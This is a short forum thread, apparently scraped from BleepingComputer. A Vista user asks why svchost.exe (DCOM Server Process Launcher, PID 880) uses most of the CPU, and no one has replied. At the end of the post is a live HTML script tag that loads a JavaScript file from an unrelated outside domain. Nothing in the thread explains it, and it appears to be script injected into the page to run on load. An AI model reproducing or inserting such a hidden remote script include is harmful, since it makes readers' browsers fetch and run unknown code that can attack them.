Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

svchost.exe is hogging two thirds of the CPU all the time

• Please log in to reply
No replies to this topic

#1 Jamiewh

Jamiewh

• Members
  • 5 posts
  •  
  • Local time:07:01 AM

Posted 23 July 2014 - 05:27 PM

PID 880 DCOM Server Process Launcher is hogging almost all my resources making my VISTA 32 bit computer run slow.

This cannot be turned off or the computer will shut down.  Anybody know what is causing this and how to stop this from happening?  Plug and Play is also PID 880 but it is DCOM Server Process Launcher is causing all the drain on resources.  I have tried to attach the dump file I created of this svchost.exe that is causing my drain on resources.
<script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

BC AdBot (Login to Remove)

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users